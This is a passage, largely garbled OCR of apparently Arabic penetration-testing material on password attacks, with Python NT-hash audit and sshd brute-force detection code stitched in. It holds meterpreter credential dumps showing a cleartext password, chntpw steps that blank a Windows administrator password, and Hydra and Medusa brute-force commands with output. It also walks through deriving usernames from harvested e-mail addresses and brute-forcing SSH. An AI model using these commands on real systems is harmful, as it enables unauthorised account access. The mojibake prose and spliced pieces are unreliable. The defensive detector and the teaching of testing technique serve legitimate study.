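    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z

    r2_order = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        # Each round has 16 steps; rotating (a, b, c, d) after every step
        # reproduces the ABCD / DABC / CDAB / BCDA pattern of the RFC.
        for i in range(16):
            a = _rotl((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl((a + G(b, c, d) + X[r2_order[i]] + 0x5A827999) & MASK,
                      (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl((a + H(b, c, d) + X[r3_order[i]] + 0x6ED9EBA1) & MASK,
                      (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT (NTLM) hash as the lowercase hex string shown inside ntlm{ ... }."""
    return md4(password.encode("utf-16-le")).hex()


CRED_RE = re.compile(r"lm\{\s*([0-9a-f]{32})\s*\},\s*ntlm\{\s*([0-9a-f]{32})\s*\}", re.I)


def audit_hash_lines(lines, skip_builtin=True):
    """Return {user: [finding codes]} for lines shaped like the msv output.

    Columns are separated by two or more spaces: AuthID, Package, Domain, User,
    Password.  Built-in NT AUTHORITY service accounts legitimately show the
    empty hashes and are skipped unless skip_builtin is False.
    """
    blank_nt = nt_hash("")
    findings = {}
    for line in lines:
        m = CRED_RE.search(line)
        if not m:
            continue                        # e.g. "n.s. (Credentials KO)"
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) < 5:
            continue
        domain, user = cols[2], cols[3]
        if skip_builtin and domain == "NT AUTHORITY":
            continue
        lm, nt = m.group(1).lower(), m.group(2).lower()
        codes = []
        if nt == blank_nt:
            codes.append("BLANK_PASSWORD")   # account usable with no password at all
        if lm != EMPTY_LM:
            codes.append("LM_HASH_STORED")   # LM hashing still enabled: weak hash on disk
        if codes:
            findings[user] = codes
    return findings


# Constructed sample in the msv layout; AUDITOR and its hash values are made up.
SAMPLE_DUMP = """\
0;996    Negotiate  NT AUTHORITY     NETWORK SERVICE   lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;38315  NTLM       TEBA-293DD90F08  JANA              lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;41001  NTLM       TEBA-293DD90F08  AUDITOR           lm{ 0123456789abcdef0123456789abcdef }, ntlm{ ffffffffffffffffffffffffffffffff }
0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO)
"""

if __name__ == "__main__":
    print("NT hash of empty password:", nt_hash(""))
    for user, codes in audit_hash_lines(SAMPLE_DUMP.splitlines()).items():
        print(f"{user}: {', '.join(codes)}")
```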
rainbow J j-^ Cy* * b» j> ^jjo£ jL^q j (j^l^JI ^1 jiljl cili£ ^ . jjj^ ^L$j cdiSaxj msv ^ — — 

jll ^ ^ jill 11a liul j£j ^3 jl liU (j^lj tdijjljVl table 

.kerberos ^y^\ aJc& cilj£ ^ \ g us ^Uaill J j^Jl Jj> > >nj ^iklauJI iaia ^jIj lLu^. tcilli LLiia> 



meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials

AuthID    Package    Domain           User              Password
0;999     NTLM       WORKGROUP        TEBA-293DD90F08$
0;30615   NTLM
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE
0;996     Negotiate  NT AUTHORITY     NETWORK SERVICE
0;38315   NTLM       TEBA-293DD90F08  JANA              moramt58
0;477161  NTLM       TEBA-293DD90F08  JANA              moramt58
0;577336  NTLM       TEBA-293DD90F08  JANA              moramt58



i^Vl^ wdigest ^I«^LuiIj c _ 5 ic- <J jj^^JI 



meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials

AuthID    Package    Domain           User              Password
0;999     NTLM       WORKGROUP        TEBA-293DD90F08$
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE
0;30615   NTLM
0;996     Negotiate  NT AUTHORITY     NETWORK SERVICE
0;38315   NTLM       TEBA-293DD90F08  JANA              moramt58
0;577336  NTLM       TEBA-293DD90F08  JANA              moramt58



<j^aLk]| J j^-^ lSj^ » ^ ^U^V (^jjjj^iyi ^j^i l-jLoi^. ~ ikiLujj Win 8 ^ Cy* ^jaxJI q\ "livessp" ^^j> 
a > *al \\\ ^ jji&W! ^jJi j ^iklauJI ^jujI *\ jjoj Aa. a^j a > *al ^1 jj^Jt ^^ic J jj^a^J! ^1^-^Miniikatz 



4ijjks jjj^J) ^ J j^aaii mimikatz_command ^ l^ll^t L*Ji £>£aj 



Password Resetting: The Building and the Wrecking Ball 

'{Live CD ISAjui UliaJ) l_a^JI Jig a 11 C5 i*i3l J jj^a jll < . illalj ^1 C5 i^ ^ ^ Ajjilll . jjuJI CjUJ£ j.u£3 j^J jU^ 

(JSl l_j jLojVI li^ ttilli ^ j > ^all jl ^Uaill J jj^a jll lg-x>l^luil (j^j ^jII t_j jLojI Password resetting 

^Ikj C5 lo ^^kiaiA sai^ jjj* A-*!& ^Uijjj SAM <-iLftSI <jUi3U ^lg-*3 ^joij ^ Password resetting 
(jjlisu D^lcl ,\iqV^ .^^aj <J jj^ jll <J^j (j-a 1^. .llLa (jj^J (jl (j^J J (j^> V cJ^-^ ^dj^ *^ s-^- 3 (jc ^>lai3l (J^*^ 

^ jjSJI cil^j .SAM < cSj 1 ^ ^ o- 8 * 1 j 5 ^ ^ J) ^ ^ 

^j-<i ^jjoi (3^^ ^ ^1 6 ^ CljUuisLill 



[chntpw -h] 



;^JU]| j-dVI il^A j^jV .t V^'im^l ^^-Sc J jjjoiaII JJJ-a (jjlisu S^lc] ^JjJ tiljl (jiajjal 



#chntpw -i /mnt/sda1/WINDOWS/system32/config/SAM



4_ilc.\ij JjixjaLil ^a^JjaaJ "-i" jjjtMIj . JjJ>Jl (jjJjistJ e^lc] £l^U^)J "chlltpw" l^Loai ib^kc*\ j-aVI 

"mnt/sdal/WINDOWS/system32/config/SAM/"j s^j ^ ^ill ^^1^31 ^1 jlii^l tSXS di^ (interactive) 

.cJi^Jl jl^aJl ^ SAM j 1 ^ ls'^ > 

jila^JI ^Vim^ti jj^y^^ S^lcU till ^ajoij ^jl l^jLuj ^^jII ^LajIsII CjIjU^JI <LuoLoj ^1 ciLoj^j ^jj > o t l!^*-^ 

JLk^j <LLauj .l^iij jUlk^ CjljlrkJI ^ a^I nilni 4 JI^joJI Jja " What to do" J*ii bU cdid l-ALj JjVI JI>JI 
"i" jbikl jl jjAj JI^joJI axj "[1]"j .<xjHJ3 "Enter" ^l^aJl ^ j^j ^ ^ill jl^J! ^ ^ill j^JI jl ^ Jl 

.^1 j^V! jlii^VI 



<>========<> chntpw Main Interactive Menu <>========<>

Loaded hives: </mnt/sda1/Windows/System32/config/SAM>

  1 - Edit user data and passwords
  9 - Registry editor, now with full write support!
  q - Quit (you will be asked if there is something to save)

What to do? [1] ->



Chntpw interactive menu. 

^l^cVl <J Enter c3j^ jfa [1] t , ^ c5^j 'l1j3 ju1 *^ ( ♦ ^ uda ^ jj^>^^ u^*^ *^lcV < 4 tiA UlUa ^ 

c_j jllaxJI ^^kiaixJI cili£ -C5 i^<JI Windows cf^* *^J^ ^jj^n^l.^U ^.LujjIj ^-Ajla Ul aJUII d jJaaJI -C5 jJal jliaVI 

^ <Jai3 J£Ja3l ^jjijj ."Administrator" c^-^^J^^^ j^^^ ^vi>»n t^^kl -L pa j^-^ nn^l l^j^ 3 

.^jj^IIaH Q±a^ 



===== chntpw Edit User Info & Passwords ====

| RID -|---------- Username ------------| Admin? |- Lock? --|
| 01f4 | Administrator                  | ADMIN  | dis/lock |
| 01f5 | Guest                          |        | dis/lock |
| 03e8 | HelpAssistant                  |        | dis/lock |
| 03eb | (name unreadable in the source)| ADMIN  |          |
| 03ec | (name unreadable in the source)| ADMIN  | dis/lock |
| 03ea | SUPPORT_388945a0               |        | dis/lock |

Select: ! - quit, . - list users, 0x<RID> - User with RID (hex)
or simply enter the username to change: [Administrator]



List of available users to reset password. 
J <j| ^^JJ . <j£ai3l J c V^lm^l jl^aJl Jc ^Vlm^l ^jojI jjjaal (Jilt jLaJt t '<A'W a U3 ^^flJ 6<JU3l a JaaJl 

! C5 jJal jjaVI j^Jl J jii J 4-^ jj 4 * 



- - - - User Edit Menu:
 1 - Clear (blank) user password
 2 - Edit (set new) user password (careful with this on XP or Vista)
 3 - Promote user (make user an administrator)
 4 - Unlock and enable user account [probably locked now]
 q - Quit editing user, back to user select
Select: [q] > 1
Password cleared!



Chntpw user edit menu* 

csIjSaj £>i* tic "[password cleared " j J^ ^jjui < CjUK ^ju^ ^> Enter J^ Jkl'j 

aJLojj jj^ Jl Jll j .^UjJI " q " Jaol tl^Jj Jll 4^jU1I J .cjLqII o-ajsll Jc SApaJI SAM ( ^1 ^3 

(n) 

" reboot " J^ ^>JI Jjj uS2ll ^Lkj LJliij <^ ^ .^Ji ^-al j jiLkl ^vim^ jjJI jVl ^ 

# <c. jli jj^Jl tiljj <J!)tk ^ l-jL li J ' ^ ^ 6 \VindowscJ^*-^ *^lcl lie .DVD 

bC 3j15^ 5 t> JSl 

Resetting a Password on a Domain Controller

.Active Directory J ^j j « SAM J j^ ^a^ U ^UJI j^JI cjUK j jaJ VWindows domain controllers 
. ^Ic-V ( alSaua ^ iUJl ^jj dipa t (offline) ^ j^j^ V Active Directory 

.(Active Directory Restore Mode) Active Directory uj^ Windows domain controllers o^j^ 
^^i^j ^ j jli 4 Active Directory ^ ^ .defragmentation J Active Directory ajU^J ciUi ^ U tAc j 
SAM c5j^' *j* lJj^j JauJI ^ ^" .. i^ l Aii-^i* Jj j^xj (Windows domain controllers) o^j^ 

Restore Mode ^ jit J ^jJI Active Directory Jl >»VI I^a (>j (dumping jt SAM 

Cj! jLiLdl ^) net user j-*^ Jll 4^^a. cIujjj ^jj t J ja.JI ■ ^ ^^^-aj .qjj*^^^ j) <Ua*-<J! <-<J£ ^ J j^-^ cJj? 1 
Jj^xj jl AiLjaU ^^kJI ^ jSj j t Active Directory Jj*^j j cJ^-*^ s^lcj ^ja^j .(SYSTEM 

http://www.nobodix.org/seb/win2003_adminpass.html

Resetting Linux Systems 

^Uaj ^ jl single mode J M lS^*-*^ *^lcj .root jj^>^ diL^lS s^lc-V <BUui ^-uij ^lAaJ ^jj t^jn^nl J 

http://linuxgazette.net/107/tomar.html

.Online Password Attack j*j cjIj^VI c> 
Online Password Attack: Gaining Access to Remote Services

jjjlixll (IP) ^—^J^VI <J J^J^ CP" ^ > ^ ^ djUa^.!>L<i £j^aj Lajta iililc < . la>Jfl '(FOOtprinting) 4jjA51I S jiaaJI ^cjU <jlal jxluil ,jjc 

jko, J jS jij^j <VNC ' PCAnywhere^ < (FTP)'Telnet « (SSH)l£- 

.*J*J jc J jj^a jll 4_x».la> j* £ jj j a > ^aJJ jll 

lJ\ c/AAj uW^' i> J ^-*^l Jj Jjj^jII jV <jj*-^ jSSVl £il jUaJI ^ (remote desktop protocol) u&J I 
." Online Password Attack" J] J jjiLA&ll jti tdjU^kll £>i& j-* s^l j lJL£&I .lAj^II jl^J <LA£1I Sjia^l 
jVI lU*^ J^L&i Jllj f ^ " Online Password Attack " ^j^i <l_jIj£1I 11a jilj 

brute force Attack c> lU^ Online Password Attack .Telnet J SSH "live service" 

jjju>£ Cjljjij UlLa. tJjlLJI J .ciAjj£jj jl ^lqAsJLuiaSI ^UjjujIj jjuJI cA &K1 <LaLuj 4^jla ^I^jjujI ^UjLa^ J^Lk j-a ^Uajll Jj <LjIa 

. Jj*j&1I ^ ^iaJI jj£2 jl ( jlVin V (Offline Password Attack) jjj^t 
jJt A ja^ll liA ^Jaj di^ lij 6 jjj£ <jjouj ^jjj jl j£*j ^-UjJI jli 'Online Password Cracker ^l^i^l 

jl ^jA^AaJLuiASi ^UjjujI j-a J Jc ^ ^1 j* ,j£tjj (jl t ; laJ Ij laJill Jc- _ \ o jlaaJI J CjU» jLlaII £-<^ l^Jfl ^JJ Jillj Jj*^ 

^j^JI jj Ua L-jlkjj (Online Password Cracker) ^ JjV' jt^ . c-iLfr& l Jll jj>^l 

^gUjj (Jj3 j>» Uaa* 4_lLaij jlajc ^JJ i u ^ a^ia >■ ^ jjc. JJJ>JI ^-^1^ jl ^ laJLuiASI ^jujI Loj jl£ lili _L_fl^i3 JjJ-« ^ laJLiba ^jujI (JLujjV 

JJ (J^> 4_iL<iJL!l JALalJj _4_Jlj3l JJJ-<JI ^ laJLu^Q ^jujI <Jj£jJ (jLoJjU ^J^J tilli AsU ^aJ _(J J^^ll (JjiauaaJ (JjuoflJjoJj ^ g II 

(jl (j-<4 J^ ^"^^ J^ .^c^ 1 ^W^) UJ 1 ^ (>< ^ liAaJlSl J£ (^-^ ^1 jl <J^iau^3l JjJ>» 4_aK/<J j^.^31 (J^auoiJ Jc JjJ«-!l J ^x»Ujj3I 

_U» lc jj A lilaJ <j1asl!I dAA (j^Jj 66jj£lL<Jl ^1^-a3I (J!L<J 4 JJ^ a JJ jJJ^ll 6 j^_a*l 

^j^^ uj%^ J^^ .THC-Hydra password cracker (Hydra) ^^i^j ^ J 

uj^ t^j .^W^ (SAM) ^Jl J^ Jj^Jlj (physical attack) Sj^W^ Windows J^ull ^UaL J^xj jjjj^ 

djjjjVI aSliA jjc jjuJI jjo£ <js el ijjj ^ill ^jI£a!I jA 11a j ttillij ^Usll Jc (jjj^la jjc. <ja jaJ ^ill da jll Uiajl 

.sjSIS jSSVl (Online Password Attack) 

Jilj (password throttling) JJJ^I Jllikl uilajj J*j <y J>^^t ^ ^ L)J^ C)t 4^ ;4iajal4 

(j£> aJJ jl (j^taJt IP jl jjP jla^ aJJ jl jldJ cCj^laJl dift J .till l^J ^ j.o.uu,all 4luilil| Jjlill J;^ i uJ CjIj^ JJP i^J jl jldJ 

cj! j/VI j- jjjS! . (Online Password Cracker)^ >"VI J^ l^l^l^l j^ Jll <ili^JI cj! j^Vl c> ^ 

.l^c ^nla J 1^ ^jUi^ cj! jjVl ^ .(Hydra)U^ j(Medusa) ^ J^ J^^ ( 

. (password guessing)u^^^ yr* Jj^^^ j^ c-jlki a£jj^3I Jc^ *^ja.j^(service) 

j^i j SQL IM LDAP TELNET SSH RDP SMB VNC IMAP POP3 HTTP ^» lU^ j 

^j^^ cJ^I c> j^^l f^l J^ c5j^ (Online Password Attack) ^ JjV^ (* c> 

^.Ull jj^Vill j^ajfl jjjuaao j 
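The section above stresses that an online attack is slow, noisy and easily stopped by password throttling, account lockout or blocking of the source address. As an added, defender-side example (not from the original book, Hydra or Medusa), the following Python implements the matching detection over sshd log lines: a sliding window per source address that flags a burst of failures, guessing spread across many usernames (what a tool walking a user list looks like) and an accepted login right after such a burst. The log lines, host name and addresses are constructed.

```python
"""Detect online password guessing in sshd logs (sliding window per source).

Added example for this page; not part of the original book, Hydra or Medusa.
Alert codes: PASSWORD_BRUTE_FORCE (many failures inside the window),
USERNAME_GUESSING (failures spread over many usernames) and
SUCCESS_AFTER_FAILURE_BURST (an accepted login right after such a burst).
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_line(line, year=2012):
    """Return (timestamp, accepted, user, ip) or None for unrelated lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog lines carry no year; the caller supplies it
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"] == "Accepted", m["user"], m["ip"]


def detect_password_guessing(lines, window_s=60, max_failures=5, max_users=3):
    """Return {source_ip: set(alert codes)} for the given log lines."""
    alerts = defaultdict(set)
    recent = defaultdict(deque)          # ip -> failures (ts, user) inside the window
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, accepted, user, ip = parsed
        window = recent[ip]
        while window and (ts - window[0][0]).total_seconds() > window_s:
            window.popleft()             # forget failures older than the window
        if accepted:
            if len(window) >= max_failures:
                alerts[ip].add("SUCCESS_AFTER_FAILURE_BURST")
            continue
        window.append((ts, user))
        if len(window) >= max_failures:
            alerts[ip].add("PASSWORD_BRUTE_FORCE")
        if len({u for _, u in window}) >= max_users:
            alerts[ip].add("USERNAME_GUESSING")
    return dict(alerts)


# Constructed log excerpt (documentation addresses, no real hosts).
SAMPLE_LOG = """\
Aug 29 07:27:17 bastion sshd[2101]: Failed password for invalid user 0 from 192.0.2.45 port 50122 ssh2
Aug 29 07:27:18 bastion sshd[2102]: Failed password for invalid user 01 from 192.0.2.45 port 50123 ssh2
Aug 29 07:27:19 bastion sshd[2103]: Failed password for invalid user 02 from 192.0.2.45 port 50124 ssh2
Aug 29 07:27:21 bastion sshd[2104]: Failed password for root from 192.0.2.45 port 50125 ssh2
Aug 29 07:27:23 bastion sshd[2105]: Failed password for jana from 192.0.2.45 port 50126 ssh2
Aug 29 07:27:25 bastion sshd[2106]: Failed password for jana from 192.0.2.45 port 50127 ssh2
Aug 29 07:27:30 bastion sshd[2109]: Accepted password for jana from 192.0.2.45 port 50140 ssh2
Aug 29 08:10:01 bastion sshd[2300]: Failed password for jana from 198.51.100.7 port 41000 ssh2
Aug 29 08:10:40 bastion sshd[2301]: Accepted password for jana from 198.51.100.7 port 41001 ssh2
"""

if __name__ == "__main__":
    for ip, codes in sorted(detect_password_guessing(SAMPLE_LOG.splitlines()).items()):
        print(ip, sorted(codes))
```

The single mistyped password from 198.51.100.7 produces no alert; the burst from 192.0.2.45 triggers all three codes.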



THC-Hydra Password Cracker (Hydra) 





Source: http://www.thc.org

. jjjJI jUI J ja. J£ J j^JaJ U£ i jjuJI CjUK ^ AjloVl CjIj^jII jj£I J ^a.l j 
jbik^U brute force ? m ^IjH ^1 j The Hacker's Choice (THC) lS* i> ^ j^j^ 5 ^ 6 ^ gr* Hydra 
IP L-fll,^ unl \ $ i£ Hydra jj-^V^ 3^1^*1 aJIUI staVI .ialLk-all CjV j£ jj jjJI (j-a <c jjla <c j^ ^ 

>C5 j jj^JVl ^jJl 3 *lvil Jj£ ^ ^^klaiJISMTP j POP3 J ^j^Ji c_jLoi^ Ji* s^^a JjSjj jj^j 
.OSXj FreeBSD 8.1 'Solaris 11 <Windows/Cygwin 'Linux ^ ^ (V 3 ^ Hydra jW^' ^ 

:<^VI J-aj£5 j^jII j j£ jj jjJI ^ ^jaxJI f&si Hydra 

smb
smbnt
smtp-auth
smtp-auth-ntlm
snmp
socks5
ssh2
svn
teamspeak
telnet
vmauthd
vnc

. password brute force tool^ ^ j*l j j£ jj jjJI <> jjj£ ^ I .Nessus i> * j^j SSL ^ I <>a^jj 

<j^aj3 (j-a '^-(3^1 cJ ♦ ^ ^ 1 UJ-^ clA^ g II (j-G jjll I^A (jV ttilli CS"^ LS^ 0 UJ^ t « ^ J 

Q jflj i u 4il t *aj< jlgJal (j-aVl (^jLuiluilj (jjJ^.L3l s-UacV ^ij J£°^ A-ia ^j;^ CjUuLljII (J-g <Jj3,j j& obVI _tiljc. t ftjuj^ll 

_^Uai3l ^Jj .JJXJ <J ^- ^ ^ ^f*-^ (J J^^ 3 (J^->->i3l (j-a 

Password Attacks | Online Attacks | Hydra 

Jj^ia JjIxjulL ^ jij L_a jjuj j ^JLLdjlill siflU till L_a jjoj 11a J 



Hydra is a tool to guess/crack valid login/password pairs - usage only allowed
for legal purposes. This tool is licensed under AGPL v3.0.
The newest version is always available at http://www.thc.org/thc-hydra
These services were not compiled in: sapr3 oracle.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.
E.g.: % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
      % export HYDRA_PROXY_HTTP=http://proxy:8080
      % export HYDRA_PROXY_AUTH=user:pass

Supported services (as listed on the screen): afp cisco cisco-enable cvs firebird ftp http-get http-head http-proxy https-get https-head https-form-get https-form-post icq imap imap-ntlm ldap2 ldap3 mssql mysql ncp nntp oracle-listener pcanywhere pcnfs pop3 pop3-ntlm postgres rexec rlogin rsh sapr3 sip

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5

root@JANA:~#



si^L, 4 SMTPfl^-W 192.168.1.1 

#hydra -l admin -P /root/password.txt 192.168.1.1 smtp
' u( jN\ £US) jjjla cp JjLiU) ^Uaj hydra-gtk Aj^^jJI ^ili^i J^ajU 
Applications | Kali Linux | Password Attacks | Online Attacks | hydra-gtk 



[Screenshot: xHydra (hydra-gtk), Target tab. Tabs: Target, Passwords, Tuning, Specific, Start. Target: Single Target (127.0.0.1) / Target List; Prefer IPV6; Protocol: afp. Output Options: Use SSL, Show Attempts, Be Verbose, Debug. Generated command line: hydra -l yourname -p yourpass -t 16 127.0.0.1 afp]



^ .Passwords (jja j& .(Word list) ^-jI^I 0^ lJ jjuj J jjja ^ Uta ^ jVl 

.Try empty passwordj Loop around users 

Username List: /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/names/nameslist.txt
Password List: /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/john.txt



[Screenshot: xHydra, Passwords tab. Username: Username (yourname) / Username List (.../user-passwd/names/namesList.txt); Loop around users. Password: Password / Password List. Colon separated file: Use Colon separated file. Try login as password; Try empty password. Generated command line: hydra -l yourname -p yourpass -e n -t 16 -u 127.0.0.1 afp]



'Performance Options .Tuning ^jf^ l^k. Jja jUU t*Ui ^Lj ^<LLJI SjIaiJI 

j ajjUJ! cjUUxJ! <> jjjSII ^axJI 11a ^ V UjI > cilli ^ j 2 16 l> (Number of tasks) fV 31 ^ ^ 
.ijc. jll ^ c^j^^ Exit after first found pair ^4 ^ lp^ .f^l u> t> 
.^jjjII ^JlJft! cf. J^^t j$i Use a HTTP/HTTPS Proxy j^l 

[Screenshot: xHydra, Tuning tab. Performance Options: Number of Tasks, Timeout, Exit after first found pair. Use a HTTP/HTTPS Proxy: No Proxy / HTTP Method / CONNECT Method; Proxy (http://127.0.0.1:8080); Proxy needs authentication. Password: yourpass. Generated command line: hydra -l yourname -p yourpass -e n -t 2 -u 127.0.0.1 afp]

[Screenshot: xHydra, Target tab with a remote host. Single Target: 202.75.54.101 / Target List; Prefer IPV6; Protocol: ftp. Output Options: Use SSL, Show Attempts, Be Verbose, Debug. Generated command line: hydra -s 21 -l yourname -p yourpass -e n -t 2 -u 202.75.54.101 ftp]



■ Start f jj ^ Start ^J^> ^ j^l <> exploit f jfc U3Li <lj*ilj 



[Screenshot: xHydra, Start tab, Output pane]

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2012-08-29 07:27:17
[DATA] 2 tasks, 1 server, 5926956 login tries (l:1907/p:3108), ~2963478 tries per task
[DATA] attacking service mysql on port 3306
[ATTEMPT] target 192.168.10.111 - login "0" - pass "" - 1 of 5926956 [child
[ATTEMPT] target 192.168.10.111 - login "01" - pass "" - 2 of 5926956 [child
[ATTEMPT] target 192.168.10.111 - login "02" - pass "" - 3 of 5926956 [child
[ATTEMPT] target 192.168.10.111 - login "03" - pass "" - 4 of 5926956 [child

hydra -V -L /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/...



\ j ft^Jj CjV jj jjJI <j-a JjJslSI JLIj) (illS aj target <j-a 
[Screenshot: xHydra, Target tab. Tabs: Target, Passwords, Tuning, Specific, Start. Protocol: afp. Output Options: Use SSL, Show Attempts, Be Verbose, Debug. Generated command line: hydra 127.0.0.1 afp -l yourname -p yourpass -t 36]



#hydra -l ftp -P passwords.txt -v 192.168.0.112 ftp
#hydra -l muts -P passwords.txt -v 192.168.0.112 pop3
#hydra -P passwords.txt -v 192.168.0.112 snmp



Medusa: Gaining Access to Remote Services 

£>j^ta Loj jAiaI! .axj ^jc ^Jjj jiill djUi^k J jj^a jll J j brute forcer l£ jl <-! Jj> * ^ aj! ^^ic Loj jAiaI! c *q>^> j 
Microsoft SQL j IMAP 'HTTP 'FTP 'Apple filing protocol ^ ^ ^ t> CjU^JI ^> ^ ^ aSjL^I! ^ 
'POP3 'PCAnywhere g^jjj 'network news transfer(NNTP) 'NetWare core protocol(NCP) 'MySQLj 
'VNC 'TelnetjSSHv2 'simple mail transfer protocol authentication(SMB) 'RLOGIN 'REXEC 
,t*Ui t> jSSl j 4 (Web forms)s^ £^ 'simple network management protocol(SNMP) 
.[medusa — d] ^VIS — d ^l>ikU J^U. ^ c*ili ^I^j l^c^j ^\ j£ jj jjJI ^jjj^ j 



root@JANA:~# medusa -d
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

  Available modules in "." :

  Available modules in "/usr/lib/medusa/modules" :
    + cvs.mod : Brute force module for CVS sessions : version 2.0
    + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0
    + http.mod : Brute force module for HTTP : version 2.0
    + imap.mod : Brute force module for IMAP sessions : version 2.0
    + mssql.mod : Brute force module for M$-SQL sessions : version 2.0
    + mysql.mod : Brute force module for MySQL sessions : version 2.0
    + ncp.mod : Brute force module for NCP sessions : version 2.0
    + nntp.mod : Brute force module for NNTP sessions : version 2.0
    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
    + pop3.mod : Brute force module for POP3 sessions : version 2.0
    + postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
    + rexec.mod : Brute force module for REXEC sessions : version 2.0
    + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
    + rsh.mod : Brute force module for RSH sessions : version 2.0
: JVI £Lj) jjjla dp Medusa Jl J^ajJt UajI 6^ 
Applications | Kali Linux | Password Attacks | Online Attacks | medusa. 

Before you can run Medusa you need several pieces of information: the IP address of the target, a username (or a list of usernames) to attempt to log in as, a password or a dictionary file (dictionary list) of candidate passwords, and the name of the service you want to authenticate against.

Usernames are usually the easiest part. If the reconnaissance phase turned up a list of valid user names, start there. Otherwise, work from the e-mail addresses harvested for the target (for example with theHarvester): the part before the @ almost always follows the organization's naming convention for accounts, so it is worth deriving several login names from each address. Suppose the harvest produced the address ben.owned@example.com. Plausible usernames to try are ownedb, bowned, benowned and ben.owned. Once you have the usernames, a password dictionary and the service to attack, you are ready to launch the brute force attack.

Medusa takes all of these as command-line switches. Its basic syntax is:

#medusa -h target_ip -u username -P path_to_password_dictionary -M authentication_service_to_attack

Let's walk through that command. The first keyword, medusa, simply invokes the brute-forcing tool. The -h switch specifies the IP address of the target host. The -u switch gives a single username that Medusa will use for every login attempt; if you have a list of usernames, use the uppercase -U switch followed by the path to the file instead. In the same way, uppercase -P takes the path to a password dictionary, while lowercase -p supplies a single password. -M names the module, that is, the service you are attacking (ssh, ftp, http and so on). Finally, if the service listens on a non-default port, add -n port_number.
Let's put this together in an example. Suppose that while gathering information on the target example.com we recovered the username ownedb from document metadata (with MetaGoofil) and found a host at 192.168.18.132 running SSH on the default port 22. Using the password list that ships with John the Ripper as the dictionary, the command to brute force that SSH login is:

#medusa -h 192.168.18.132 -u ownedb -P /usr/share/john/password.lst -M ssh



If Medusa complains about its modules (an error seen with some versions of the Kali package), remove the package and reinstall it, then run the command again:

#apt-get remove medusa
#apt-get update
#apt-get install medusa
root@bt:~# medusa -h 192.168.18.132 -u ownedb -P /pentest/passwords/john/password.lst -M ssh
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 192.168.18.132 (1 of 1, 0 complete) User: ownedb (1 of 1, 0 complete) Password: 123456 (1 of 3546 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.18.132 (1 of 1, 0 complete) User: ownedb (1 of 1, 0 complete) Password: 12345 (2 of 3546 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.18.132 (1 of 1, 0 complete) User: ownedb (1 of 1, 0 complete) Password: password (3 of 3546 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.18.132 (1 of 1, 0 complete) User: ownedb (1 of 1, 0 complete) Password: password1 (4 of 3546 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.18.132 (1 of 1, 0 complete) User: ownedb (1 of 1, 0 complete) Password: 123456789 (5 of 3546 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.18.132 (1 of 1, 0 complete) User: ownedb (1 of 1, 0 complete) Password: 12345678 (6 of 3546 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.18.132 (1 of 1, 0 complete) User: ownedb (1 of 1, 0 complete) Password: 1234567890 (7 of 3546 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.18.132 (1 of 1, 0 complete) User: ownedb (1 of 1, 0 complete) Password: abc123 (8 of 3546 complete)
